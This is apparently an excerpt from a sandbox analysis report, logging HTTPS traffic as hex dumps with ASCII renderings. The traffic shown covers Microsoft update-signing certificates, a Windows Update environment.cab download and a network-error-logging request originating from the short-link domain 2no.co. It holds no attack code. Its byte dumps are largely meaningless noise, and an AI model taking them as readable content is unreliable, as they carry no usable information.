7a ff eb d7 51 b1 6e c1 ab 93 18 23 44 ed 8b 90 55 dd b1 c5 cc 37 47 84 72 4e 0b 9d b5 97 64 13 a3 87 Data Ascii: `-`X}+@@`6~cP*(=Zzsk[5MvKK5"b1g37JZ?5Q:8^w!=fx.LvQ>7D5^"y[\S=12M?m.&L5!Uo{}IRzQn#DU7GrNd
2025-10-17 06:51:43 UTC	1460	IN	Data Raw: 62 12 65 7f e0 9a 16 0b d9 d3 5e b1 ae 8d 4c cb 63 92 31 66 af ec 48 f3 5e 8b cd 19 d4 eb 1f 3e 97 ec b1 0e 77 08 18 8e 4c 51 98 2c 23 0b 19 00 42 d2 5d 59 91 cf fb dc 89 b5 1f 94 6e 6e 20 7a 8d 84 25 7b c5 4e 91 d2 5c f9 c8 ad 30 50 74 64 88 91 a5 66 3b 3a e5 29 9d 68 07 a4 83 f0 4b 9b ab fa d1 16 f3 aa e5 67 e9 1b 2e d7 a7 dd 0e 6d 3d 9d ed e3 51 e1 a0 1f 8d 89 62 e0 e8 4a e2 aa 52 26 97 e2 d0 3d 2d 84 11 2f 14 06 69 ae f2 2e d0 88 d9 5f 7a ba a2 1e 90 95 d2 3a be 2a 49 7f bc 3b 50 20 27 f9 36 29 d9 90 6e 66 48 1b bf c1 65 a2 3b 65 2b c4 a1 9f 28 da ac bb eb 2a e7 73 f5 8d 50 9a b6 d6 11 24 77 79 5e 5e 7e 45 41 2a 6a 9e ec d0 77 a9 aa cb 47 46 7e b1 a1 e1 23 f9 fc 61 e3 89 57 ef 24 2e a7 db 2f 72 f0 0a 98 79 74 9d 78 c0 50 ea 60 d6 f3 dc fc c5 b5 7e 66 Data Ascii: be^Lc1fH^>wLQ,#B]Ynn z%{N\0Ptdf;:)hKg.m=QbJR&=-/i._z:I;P '6)nfHe;e+(sP$wy^^~EA*jwGF~#aW$./rytxP`~f
2025-10-17 06:51:43 UTC	1460	IN	Data Raw: db 14 e7 0e 05 5d 43 1b e3 bd ed ac 5c 93 bf 1e 6a df 24 d3 e4 3f 72 79 48 28 97 b3 af 9c 30 e4 fd 35 df b2 99 12 25 bd a4 c7 af 35 ee 98 e9 78 bd d7 f5 ad 79 64 e3 3a 09 dc 30 9b a7 ba 6d 92 dd 51 3f 7e cf 5d d1 0f 8b c6 f4 db 0e 9c 53 2a b4 e0 d4 25 48 6d 4b 8d 30 0b 6c 58 c8 42 5c ee 7e a6 70 f9 c9 fd ca 46 81 07 21 d6 e1 82 9f 3b 2c 8f 78 2a 25 7d 3e 78 ff 7e ac e6 bd 12 2d b2 77 ba ec 88 49 4b f3 ab 88 9c 3e bd c5 35 87 f4 8a 26 c1 04 e5 38 53 a8 b1 89 9e a9 0b d9 30 bc c5 2e 5e fa 52 a6 92 f1 3d 3a 19 f8 23 06 af 68 e2 79 77 ca 51 85 6f b1 b6 06 ce 2d aa ec 8b ac d5 8c d9 52 f5 9e 8a a9 41 6f 2d 59 b6 43 5e 71 b0 e6 89 1c f9 29 3a be 91 4b 6b 05 b2 3e 61 15 f5 e1 55 bf 43 ee 41 43 11 c6 39 1f c0 66 2f 3a 3e 06 98 00 46 58 03 ac 5e 8c ce df 25 8a 7e Data Ascii: ]C\j$?ryH(05%5xyd:0mQ?~]S%HmK0lXB\~pF!;,x%}>x~-wIK>5&8S0.^R=:#hywQo-RAo-YC^q):Kk>aUCAC9f/:>FX^%~
2025-10-17 06:51:43 UTC	1460	IN	Data Raw: 56 98 31 60 08 e8 e3 93 7e a3 54 a2 42 71 59 b3 02 20 f7 0d 2c 20 60 3a e4 5f 81 94 32 da ce 57 d8 c0 c1 0b ed eb e2 87 f6 09 14 72 f6 f3 00 a8 f7 88 9b 9f 61 e7 7f 4b 73 51 7c 07 31 3c 00 8a fb f9 09 c5 07 d6 4c ba 12 67 6f 5a 9e 70 ee 93 49 b9 60 31 d8 93 c6 d0 0c 98 ec a1 b8 2e a0 0d 1c c5 6a 60 d5 62 54 fe 3d 8e 6b 87 7f 02 04 01 51 41 04 72 17 bc cd f7 81 b7 0e a0 05 68 ee 03 6f d9 bf c9 6f fd 3c b6 df 1f 81 6e ba 71 e8 c6 91 e2 29 81 c3 4e 60 38 a7 c5 54 86 cf d1 8d 7c f4 1b 4b 9a 2a 59 1d 35 fb 53 65 f8 c9 57 64 e0 c8 3b 12 83 8d de a2 72 23 f6 ee 21 bd fe 12 1e 0f 28 e0 2f 1b 13 bf b8 f7 65 a6 30 b0 2f ce 39 3a 49 1a 6a 8f a7 56 57 1d 3a 35 24 2a 74 3d 1f 63 02 82 96 e2 d5 c6 cd ba 4c 56 13 2d 06 4f b8 a2 6b f9 ba 3c 87 e4 d4 fd c1 c3 0c cf 3d 30 Data Ascii: V1`~TBqY , `:_2WraKsQ\|1<LgoZpI`1.j`bT=kQArhoo<nq)N`8T\|KY5SeWd;r#!(/e0/9:IjVW:5$t=cLV-Ok<=0
2025-10-17 06:51:43 UTC	1460	IN	Data Raw: f7 04 2a c3 29 ae 39 53 da c6 c0 43 3d 61 77 18 ae 6c 3a 3e 58 1a 5b e7 42 0b 1e 3a 22 20 42 74 2f 9f db c8 9a a0 80 6b d5 60 b5 dc 58 a8 5e da 41 f4 aa b0 cc a0 90 1d f2 38 ab 87 11 29 9f 29 b7 5d ae d0 bc e1 99 b4 6c eb 74 4e da e3 c3 4d 4e 81 69 f1 fe 62 00 af fc 31 32 48 45 9e 1e 8c 2f ae 40 fa d4 78 cf c8 c6 6b 81 29 c7 cb 83 b9 9d ef 4f 39 9b 68 3c 77 18 ed 26 d1 94 28 01 5d 5e 04 c1 10 2b 57 c0 94 09 41 c9 c5 45 75 be 0b 73 7d a9 4b a9 6f 09 8c 07 5a eb ea 2e 8c 07 89 be e7 33 69 0a 29 39 ea 65 91 90 c7 ad 6a 43 bf 96 c3 f6 f1 91 b5 d8 0c 79 53 5f 24 98 d3 3c e7 9c 54 ae fd 58 56 24 1c f5 e8 d4 86 a5 7f ae d0 3d fd b9 f4 e2 77 96 fa 2f aa f1 cf 73 64 a4 84 8e f6 a8 fb 13 44 2b a4 1b b6 45 43 08 8b 2f 3e 1b cc a5 94 1f c6 cf 34 22 78 f7 ac 93 b8 14 Data Ascii: *)9SC=awl:>X[B:" Bt/k`X^A8))]ltNMNib12HE/@xk)O9h<w&(]^+WAEus}KoZ.3i)9ejCyS_$<TXV$=w/sdD+EC/>4"x
2025-10-17 06:51:43 UTC	1460	IN	Data Raw: 34 96 b5 e3 91 1f 30 1d 2e 91 a0 c0 3b 0b a0 02 84 97 f3 f3 0d 8e 37 43 3f d8 d0 81 82 96 5a 3b 15 6b 06 cf a6 d5 fa 4c 68 d7 fb 6a 1c bf 0b 93 53 b1 cf 4a 4a 07 2e 6c 83 ce 2e 7a 96 e2 a9 bc b9 43 bb e8 58 5b 98 a0 6a 99 af 96 f6 06 65 10 8a c9 f8 d4 a5 42 40 d3 ad a8 2b 27 64 26 79 95 fc dd 88 9a 59 2b 50 11 ed 1b 6b 4c 9c 56 c6 79 eb ee 0d c1 17 0a 8a f7 f2 fa ba 06 4e 35 2f ac 9b c0 3e b0 1c 10 94 66 10 dc 3c f7 a8 97 9c 16 90 7f be ba 21 29 c2 44 b2 b5 91 38 7e 2d ef 6e f5 e0 88 70 8e dd 49 ad 01 5e cd ae 42 9b 6e 8f 73 c5 6a 9f 8d 87 cb e9 21 e8 21 ad c6 e1 3c e2 dc e0 57 95 f2 e4 47 39 eb 6b 51 a7 b7 4e f3 60 66 2e 43 42 52 8b c4 99 a2 b1 9e 03 2c e6 db 47 e1 e7 37 bb 6a 00 c9 b1 17 33 26 c1 17 0c d0 ed b5 62 1b 06 bd 19 72 db fa 4a ba 4e f3 f9 c7 Data Ascii: 40.;7C?Z;kLhjSJJ.l.zCX[jeB@+'d&yY+PkLVyN5/>f<!)D8~-npI^Bnsj!!<WG9kQN`f.CBR,G7j3&brJN
2025-10-17 06:51:43 UTC	1460	IN	Data Raw: 65 72 61 74 69 6f 6e 73 20 4c 69 6d 69 74 65 64 31 16 30 14 06 03 55 04 05 13 0d 32 33 30 38 33 37 2b 35 30 35 33 37 33 30 1f 06 03 55 1d 23 04 18 30 16 80 14 5d 5d 6b fb 4b 21 4a 48 ba da 67 52 b9 6a 3b 8d c4 91 55 ad 30 60 06 03 55 1d 1f 04 59 30 57 30 55 a0 53 a0 51 86 4f 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 70 6b 69 6f 70 73 2f 63 72 6c 2f 4d 69 63 72 6f 73 6f 66 74 25 32 30 55 70 64 61 74 65 25 32 30 53 69 67 6e 69 6e 67 25 32 30 43 41 25 32 30 32 2e 32 2e 63 72 6c 30 6d 06 08 2b 06 01 05 05 07 01 01 04 61 30 5f 30 5d 06 08 2b 06 01 05 05 07 30 02 86 51 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 70 6b 69 6f 70 73 2f 63 65 72 74 73 2f 4d 69 63 72 6f 73 6f 66 74 25 32 30 55 70 64 61 Data Ascii: erations Limited10U230837+5053730U#0]]kK!JHgRj;U0`UY0W0USQOhttp://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.2.crl0m+a0_0]+0Qhttp://www.microsoft.com/pkiops/certs/Microsoft%20Upda
2025-10-17 06:51:43 UTC	1460	IN	Data Raw: bb 5d 0d f9 26 e5 08 e4 a3 37 63 93 9b 47 f2 d4 91 f6 40 ee e9 dd e3 56 36 e0 42 ef a7 69 dd b5 c8 c2 e6 cf 0b 27 85 c7 61 71 8f b2 ef d1 2b f0 8f 82 f5 8a c0 2f 4c db 1d 6e 52 ad 96 16 be 5e a2 89 14 2a 7e 0e ba a3 32 70 11 3c 87 5a 52 74 f7 f6 9e f0 73 03 e9 f1 86 2f f5 26 93 ad 80 b3 b1 8f 4f 87 7a 63 8a db d7 da b1 2e 02 c4 27 f1 30 c7 6d bd 7b 98 70 02 fb 7e 2d 4d 08 f5 a1 0f 25 a4 d5 40 34 72 d1 66 37 1c 9a d8 61 3c 1f cc 8a 29 66 98 6c 09 f1 2c 35 aa 3a 70 e8 97 3f cf dd cb 2d 06 64 32 be c4 a1 58 bf 8b 2a cc 3f da bf a8 39 c2 b1 30 ed 4b df f6 56 c7 63 4e 52 e0 20 5e fb bf 57 96 88 cd b1 eb bd 67 ca 3f a2 25 44 4b de b2 52 39 43 56 fc d9 bf f4 fc 5d 64 e2 5b fd 2c 11 52 ba 0e 72 66 08 75 29 09 0e d0 a4 68 2a ef 97 a9 1e 72 3d 95 e6 d5 4c 86 37 c2 Data Ascii: ]&7cG@V6Bi'aq+/LnR^~2p<ZRts/&Ozc.'0m{p~-M%@4rf7a<)fl,5:p?-d2X?90KVcNR ^Wg?%DKR9CV]d[,Rrfu)h*r=L7
2025-10-17 06:51:43 UTC	1460	IN	Data Raw: 2b 06 01 04 01 82 37 02 01 0c 31 34 30 32 a0 14 80 12 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 a1 1a 80 18 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 04 82 01 00 68 2b 5b 79 01 32 2c 78 e1 ba c6 6c 40 4b 86 bc cf 44 ef 3f 13 64 b9 a5 e8 74 cd 0c 6f ec 98 15 ff b1 01 3d fc 04 bb 27 8a 21 51 a4 8c b9 4c a2 19 93 29 67 a7 06 54 3d 9c c9 12 8a 4f 44 88 29 15 2f 9a c6 6f 11 71 a6 23 2e eb 3a c2 37 bc f7 c9 d2 25 ba 8f f2 8c c8 0a 5c 61 00 c9 ce a8 19 48 68 2e ab d3 ff d3 ea 00 c1 e3 a9 a1 8a ba c4 76 c6 b1 3c 3c f6 7d 02 12 b1 01 a4 a8 d1 11 c5 c0 3f fa 94 5e 91 9e d6 3f 64 37 1c eb 82 ca 08 05 06 d3 50 b1 29 41 25 c3 cf a5 88 a7 88 c2 14 e0 37 49 53 9a e1 6f 53 d2 27 78 4c Data Ascii: +71402Microsofthttp://www.microsoft.com0*Hh+[y2,xl@KD?dto='!QL)gT=OD)/oq#.:7%\aHh.v<<}?^?d7P)A%7ISoS'xL

Timestamp	Bytes transferred	Direction	Data
2025-10-17 06:52:22 UTC	309	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.3324/0?CH=563&L=en-GB&P=&PT=0x30&WUA=10.0.19041.3031&MK=AcPUwcOz8OR7GCH&MD=a89v54tN HTTP/1.1 host: slscr.update.microsoft.com accept: / user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 accept-encoding: identity
2025-10-17 06:52:22 UTC	558	IN	HTTP/1.1 200 OK content-type: application/octet-stream date: Fri, 17 Oct 2025 06:52:22 GMT cache-control: no-cache etag: "brPkj8hDuDTJx3/WLPFVXuuGmEy7AYhljGXgap4xlDk=_1440" expires: -1 last-modified: Mon, 01 Jan 0001 00:00:00 GMT pragma: no-cache content-length: 30230 slsversion: 2.0 ms-correlationid: b08ffd72-52c3-4349-ba16-14390eb4330d ms-requestid: 96f6f00b-c8bb-4a2a-85e0-918f96ea1702 ms-cv: kj0LxHkD8ESd7a0w.0 x-content-type-options: nosniff x-microsoft-slsclientcache: 1440 content-disposition: attachment; filename=environment.cab
2025-10-17 06:52:22 UTC	1460	IN	Data Raw: 4d 53 43 46 00 00 00 00 86 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 72 c7 00 00 14 00 00 00 00 00 10 00 86 2b 00 00 90 4a 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 ea 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 b8 1d 05 9b 1a 2b ea 4d 43 4b ed 7a 05 58 54 eb da f6 14 dd 0d 0a 48 87 12 6b 66 68 a4 53 ba 51 10 10 c9 a1 63 50 a4 19 4a 40 40 42 01 a5 41 69 14 91 90 94 12 94 46 91 12 09 09 41 42 a4 54 10 fe 41 dd 5b 76 9c 7d ce 3e ff 77 ae b3 bf ef da 73 5d 33 b3 de 58 ef 7a d7 bb de e7 b9 9f e7 5e b7 a6 be 82 32 08 fb 31 81 82 be 7e 14 bf fd 81 a0 60 30 08 0c 82 81 b8 98 40 20 ea af 35 e4 5f fb 5c 57 03 fd fc b1 c6 7e 0f 7b 05 e3 80 8e 7c 82 40 36 2e 97 50 1e ae 2e ce 36 Data Ascii: MSCF+Dr+JdMenvironment.cab+MCKzXTHkfhSQcPJ@@BAiFABTA[v}>ws]3Xz^21~`0@ 5_\W~{\|@6.P.6
2025-10-17 06:52:22 UTC	1460	IN	Data Raw: f8 85 f5 4e da a0 8d db 96 f6 4d b3 54 43 d7 f9 6a 60 30 5c 0a 2a ad ee 77 22 4c d2 63 ce f2 bc 77 77 10 d3 99 ba d7 f1 22 d1 2c d7 17 39 60 5c 90 4f 48 db 56 a7 9a 92 2b 5e 69 37 15 db ed 53 7a 3f 2a 99 e8 73 8d 02 4a 75 fb 0a 9c c3 c7 af e2 d3 3e 2a 9c 95 53 d6 8a f9 3c 65 c5 a9 07 75 7d d3 93 7a 2e ca c3 6f 34 b5 7d 1e ef 42 85 c2 65 0d 35 4f 83 2c 28 6b cd ad 0c 19 e2 36 2f 86 e6 77 99 eb 77 25 50 eb fc 6e 0b b8 27 a1 b7 5d 3d 14 2e 94 0f 59 7d f0 f6 73 7c c8 de 5a ae b6 84 f4 85 d4 dd 7c 97 2e bc a9 1e 12 de d5 99 6a ed 7b 5b 40 26 a2 29 34 94 11 b9 aa 63 2b b2 b3 10 16 28 b2 46 9b de bf a4 df 0c 81 62 d1 24 17 03 8e c6 ae 48 04 70 02 bb 8c 4c 9c 30 7a 80 f6 e7 1d ae 81 0b c6 c5 c7 1e e3 e0 e0 41 a1 00 d3 61 07 52 18 2d 8c 7a bb b6 5e 5b ef 41 6f ed Data Ascii: NMTCj`0\w"Lcww",9`\OHV+^i7Sz?sJu>*S<eu}z.o4}Be5O,(k6/ww%Pn']=.Y}s\|Z\|.j{[@&)4c+(Fb$HpL0zAaR-z^[Ao
2025-10-17 06:52:22 UTC	1460	IN	Data Raw: 21 8f 01 5b 51 c6 5b 23 96 a7 4f 74 47 f1 da a6 38 11 ac f3 09 17 49 b8 bd 4d 96 e9 9b e8 e2 c7 b5 46 34 b6 65 9f 6d 8a 3e d9 2d 33 d6 54 20 de 52 0e ac a8 4f 6e 1b 75 58 69 e9 4d b1 98 ef 36 19 df bc da 53 fe ae c1 ee 99 4c 0e a7 a2 fa eb 07 7a e2 0a 46 7b a3 4d 9b 7b 66 d6 33 a6 5f f8 28 f4 6a 49 3d 6c f1 bd 78 09 48 fb f3 ec 4f ae 25 17 32 7b 48 dd 98 1f d2 08 17 6d b9 9b 93 c0 31 77 ea 27 90 74 c5 82 a4 23 40 8e 4b f0 1d 1b 69 c0 30 ac 39 82 8e a0 e2 ef a2 15 c3 cf 27 50 43 60 c4 cc 84 20 7d 90 17 e8 22 48 01 24 07 10 1d 9e 49 06 3b 1c 26 1c a0 fc 19 04 f0 01 5c ec df e1 d0 47 a1 d0 83 5f 02 02 bf ae f0 88 1a 47 6b 7a 29 bf 03 3e c0 1e 29 04 98 7c 83 42 7d 40 17 d0 ce d2 cc 52 0f 3f f3 1d 9d b0 28 f6 5b 74 fa 8a 83 6e 1e ae d6 5e 56 df 10 0a 6b ba 58 Data Ascii: ![Q[#OtG8IMF4em>-3T ROnuXiM6SLzF{M{f3_(jI=lxHO%2{Hm1w't#@Ki09'PC` }"H$I;&\G_Gkz)>)\|B}@R?([tn^VkX
2025-10-17 06:52:22 UTC	1460	IN	Data Raw: c8 7f c4 c8 e0 fd fe 82 16 5f 21 56 a2 43 ca 14 5b fa 75 8c ec f7 1f 59 09 2e 80 e3 db 8c 99 7e 77 c6 3a 87 ae 03 fb 84 bf 92 25 42 80 28 42 18 2e 86 84 c3 c5 0e c3 62 61 38 80 40 7c 2f fe df 7c 50 ff 34 d8 ae af 67 a5 a3 b9 53 40 2a 9a 63 0a 9b 7a 9f 11 9c c1 75 66 17 6f 34 74 90 47 59 f0 3d 6a 67 b2 34 38 b5 24 cd 0b 9b 76 bd 80 e7 7d e9 31 71 a9 ba e0 c5 e6 1d 4a d7 ba 22 30 53 68 d2 15 44 f2 2a 8a 9b 7d 55 52 24 a5 21 20 f6 52 7b 3f 1d dc 9f f7 58 b5 90 cf 9d 7a 25 ab cb ce 7b c3 a7 8b 37 97 57 fc a2 2d df 90 b1 ad 76 e1 22 78 c8 94 52 6d 5f 4b 8b 64 07 3e 07 2e b7 b1 3c 23 20 ab 06 bd 33 04 47 77 2e 22 90 5e fa 57 3d 8a 42 1d 1b 60 ac 37 94 06 5e 6e 9f 8b 43 d4 be 48 da ca b1 b4 50 37 60 b9 62 18 11 00 52 e2 f7 fa 1c 74 a9 d0 d3 98 5c fc 95 2a 5c ad Data Ascii: _!VC[uY.~w:%B(B.ba8@\|/\|P4gS@czufo4tGY=jg48$v}1qJ"0ShD}UR$! R{?Xz%{7W-v"xRm_Kd>.<# 3Gw."^W=B`7^nCHP7`bRt\*\
2025-10-17 06:52:22 UTC	1460	IN	Data Raw: e6 7e ac 7e df cb e5 30 23 cd b5 89 fa 98 bc 37 f1 71 0f c4 f9 74 d3 16 dd 50 24 cf 44 f8 dd 62 e1 9d c2 3c 0d 6f 1e 46 70 b4 4e 3d 8d 0b a8 34 88 7b f5 19 c7 30 c5 d9 5e f2 96 72 c3 4a 5e 99 0f af 68 49 d7 bb 10 a5 05 65 97 67 88 a1 c7 e1 c0 79 6d be 99 8b 0f 7a 1e cd c4 5c 9d bd 59 02 56 ab 6b 74 2f a4 33 b5 bb f0 fa 63 42 3c 33 93 d4 17 96 3e 4f 7f b9 5b ca 5e 3d 6d 16 42 13 94 91 2f bf dc 61 f1 0f d8 1b cd 50 9a ac f2 10 1c f7 b7 08 aa 1d 2f 0a 10 59 16 d1 d8 3e e5 52 40 a9 fb b6 09 07 9a 3b e0 79 57 53 14 9d c4 28 84 21 7b 4f fe a1 5a 85 7e 25 ff 6d aa 9f 8c c6 f8 3d f3 96 8d a1 11 4f 29 05 ad 66 a4 b8 46 2c a4 5e de 5e 80 7c 29 54 57 79 66 a0 c1 81 de c4 12 ec f9 cc 2e c7 7c 98 e7 12 64 06 49 ef 31 9c cf f2 be e5 33 25 e1 b0 95 2b f1 53 11 eb 68 d3 Data Ascii: ~~0#7qtP$Db<oFpN=4{0^rJ^hIegymz\YVkt/3cB<3>O[^=mB/aP/Y>R@;yWS(!{OZ~%m=O)fF,^^\|)TWyf.\|dI13%+Sh
2025-10-17 06:52:22 UTC	1460	IN	Data Raw: 18 96 d1 f4 61 0b db 60 d2 b3 a5 d4 53 3f 71 1a 6e 6a 5e 09 89 88 15 a9 83 63 60 24 00 06 46 f0 95 15 4e fc ef ee a7 7f c8 3c 1d e5 84 31 60 35 e0 d8 51 52 98 e4 17 dc e0 6f 78 5f 65 d6 47 06 6c e5 69 7d a2 72 5b 94 15 93 82 fe 76 26 32 22 0a 84 86 94 8f a7 a8 f9 0d 45 7c 76 81 e0 cf 47 06 80 08 c2 83 97 80 e0 05 20 78 16 08 6e 80 b1 50 84 75 4f ec e9 77 66 d2 0f ec a0 aa 42 b7 8a 3c df 3d 11 73 0e d8 8b a1 ad 92 2d a9 e6 41 5f 01 82 53 fe 02 86 f8 fb 0b 87 bd 79 aa 0f 3c 67 2c 4c d3 36 0e aa 95 cf bf 9a 2a 13 a3 a5 7d c0 51 64 6a f1 16 de 4f 72 6f ae ea 5e ef af 2c 02 86 81 80 22 2f a9 9d 2d dc 96 a1 7a 77 87 a1 c0 29 75 69 6b 7e 4d a7 b8 db 38 a0 c8 38 40 aa 61 3a 84 da d0 c2 53 dc e8 be 2c 86 3c c8 c0 53 ed fa dd e9 1d c7 46 d7 67 f4 2b 81 ec 75 8b 6b Data Ascii: a`S?qnj^c`$FN<1`5QRox_eGli}r[v&2"E\|vG xnPuOwfB<=s-A_Sy<g,L6*}QdjOro^,"/-zw)uik~M88@a:S,<SFg+uk
2025-10-17 06:52:22 UTC	1460	IN	Data Raw: 04 20 48 60 8c 86 1b 0a b1 7d 7c 48 f7 b1 6c b6 46 34 d1 01 36 75 49 3c 06 a7 3b 4f 8c 24 39 57 d0 76 18 67 5e 9e b7 cb 7e bc 69 5a c9 27 73 42 ba 0e 02 07 ad 8c 67 e4 dc 7e d4 12 12 73 27 86 21 60 97 36 ba 3a a5 7e 09 71 f9 b3 49 62 05 0b 21 eb 0a fe 20 40 1b 3f 08 f3 29 70 7d 65 b2 a0 0e d6 53 ad 80 63 18 02 01 0c 83 ef d7 94 e8 d6 5f c2 28 7f 3f 48 f9 b5 5a a6 19 3b 33 c2 9f 52 19 06 18 1c 7a 78 07 ff bb 04 34 44 3f bb 1e 6c 30 a7 0a 28 43 58 41 3b d4 4c 95 d4 73 d7 0d 6b a1 01 11 88 73 c7 c2 77 72 8f 2d 55 a2 ae 3f ca 61 7d 78 ca 07 b8 ee 85 ed 92 db e5 70 cc 07 be fc 00 ac a9 7c c7 da e6 ec ec 83 86 d7 d0 a2 0c f1 c6 00 b2 cf 71 8e 9c 42 5d d9 18 ba d2 ff ae 08 e5 61 6c ff 88 69 ca ac 76 57 af c5 ba 34 e0 1f 4d 41 e4 4b 4d 6a fc 2c ca 4d a9 6a 15 83 Data Ascii: H`}\|HlF46uI<;O$9Wvg^~iZ'sBg~s'!`6:~qIb! @?)p}eSc_(?HZ;3Rzx4D?l0(CXA;Lskswr-U?a}xp\|qB]alivW4MAKMj,Mj
2025-10-17 06:52:22 UTC	1460	IN	Data Raw: 80 1f 22 14 41 92 ef 07 94 a8 ef 22 14 74 d1 ff b0 08 45 c5 61 da 2a 5e cf 3b 31 d3 98 d6 54 32 8b 34 85 87 cd 30 06 37 40 b0 b1 50 ae 49 c7 c3 43 1c 71 d2 ed 98 f6 95 e4 3b 13 66 e3 9e 73 a9 c6 4f a3 7a 0e 2a 76 f2 cf 08 89 3d f3 3d 91 22 13 26 6b 73 31 a0 c3 3f b4 ec 53 6a 9a 88 17 34 b6 b3 b1 4d 8b bb c9 81 d0 4d 7d 7b d3 b6 eb f4 4e e8 47 bf 6d 9c f7 97 f2 1b da 23 d9 f9 e0 b5 b7 0d 79 da 18 72 48 47 19 e5 88 92 4e 14 82 5e f7 bd 2e e6 28 cb 71 50 01 62 65 3a 7b ce 5f a1 cd 34 da 7f 01 ca 23 3a d7 5a 06 61 a6 be 40 5e 54 23 be bb 22 1c 62 b0 53 1e d2 9a 1f bb 4a 3c fa 84 dd 36 e5 1a de 95 59 2f b1 b6 e5 f8 81 cf e3 8a eb c5 44 7b b2 e4 57 ae 2f 24 de 95 a9 09 18 9e cb e6 88 ad 4f 9c 87 0a b2 a5 84 65 f6 bc 8c c2 cf 78 f3 e6 7d d4 bb 90 e6 5b 52 0c 1d Data Ascii: "A"tEa^;1T2407@PICq;fsOzv=="&ks1?Sj4MM}{NGm#yrHGN^.(qPbe:{_4#:Za@^T#"bSJ<6Y/D{W/$Oex}[R
2025-10-17 06:52:22 UTC	1460	IN	Data Raw: 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 ee ba 16 3c d5 fe 35 39 3b 71 73 9e 12 b0 6a 2a 40 86 26 38 4f 19 e7 ee db de 3b 51 2e a7 ba 26 df 39 8c a4 f0 c2 5e 83 03 92 5e 18 6a aa 62 3c bb ec 36 e8 22 7a 69 01 0c ba bb c5 f2 84 06 d8 6a 35 71 2b 69 1b 6c 44 c4 94 99 ba 93 7e 63 9e 63 20 0e fa a5 fc 7e ee 0c c7 bb dc 06 e2 ac 20 1e ff d8 b4 75 b3 e2 c5 03 ab a2 92 3d e1 66 30 bf 9b 0d 57 ec d9 a3 17 94 31 ca 96 d8 87 89 97 13 a8 60 e8 c2 e6 8d d9 d4 d2 b2 d8 ff 1a 8c e6 34 56 ce e3 81 eb 04 d9 08 b1 6f a1 85 eb 6d 53 70 3c 23 f9 8c ab ef 4d b9 00 0c 4c d7 35 52 05 bb d6 31 8f bf 6b 2d cb fd 12 af 5c e9 1e ea 72 a9 3c ee 03 b7 53 e8 de 5c 81 b1 51 95 12 b8 45 23 f5 e8 df 5c b8 f1 0c 72 fa 4d 59 a6 e0 ee 0c 3f 01 47 2d b1 0b d1 Data Ascii: H0<59;qsj*@&8O;Q.&9^^jb<6"zij5q+ilD~cc ~ u=f0W1`4VomSp<#ML5R1k-\r<S\QE#\rMY?G-
2025-10-17 06:52:22 UTC	1460	IN	Data Raw: 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 55 70 64 61 74 65 20 53 69 67 6e 69 6e 67 20 43 41 20 32 2e 31 30 82 02 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 02 0f 00 30 82 02 0a 02 82 02 01 00 bd a0 42 8a b6 56 f0 7a c0 2b 51 e1 ca dd d7 b6 97 ca 02 e9 9d 12 15 ce e6 3a 92 97 3f ee fe 38 5d 53 e3 24 09 7f 70 51 1b 7b c5 0e 5c cc c1 f9 93 35 24 4a 61 05 3c b2 f2 2e ff c9 5e c6 6a c8 62 78 79 47 02 35 a9 36 45 5d 70 ff 14 ad 94 a3 49 50 10 c2 b3 18 80 0d fe 91 af 04 5c a2 84 af 8b e4 b3 a7 48 bd e8 ba 7a e2 ae 35 49 08 19 9c 63 ae c3 c1 a9 f1 Data Ascii: Washington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Update Signing CA 2.10"0*H0BVz+Q:?8]S$pQ{\5$Ja<.^jbxyG56E]pIP\Hz5Ic

Timestamp	Bytes transferred	Direction	Data
2025-10-17 06:52:36 UTC	502	OUT	OPTIONS /report/v4?s=A7t3Og%2Bw6gkykw5ZQlhrCwiQ%2BawvADu0Yr9ZAKkZt9xXRpOjS3EmhsUIl8Q1dP5B3o8xdMdxKR5WQyTIhAXsRu7gViQyImXI0H9GmIq1P%2Fx1fvH%2B9dnsano%3D HTTP/1.1 host: a.nel.cloudflare.com origin: https://2no.co access-control-request-method: POST access-control-request-headers: content-type user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=4, i
2025-10-17 06:52:36 UTC	317	IN	HTTP/1.1 200 OK content-length: 0 access-control-max-age: 86400 access-control-allow-methods: OPTIONS, POST access-control-allow-origin: * access-control-allow-headers: content-length, content-type date: Fri, 17 Oct 2025 06:52:36 GMT via: 1.1 google alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
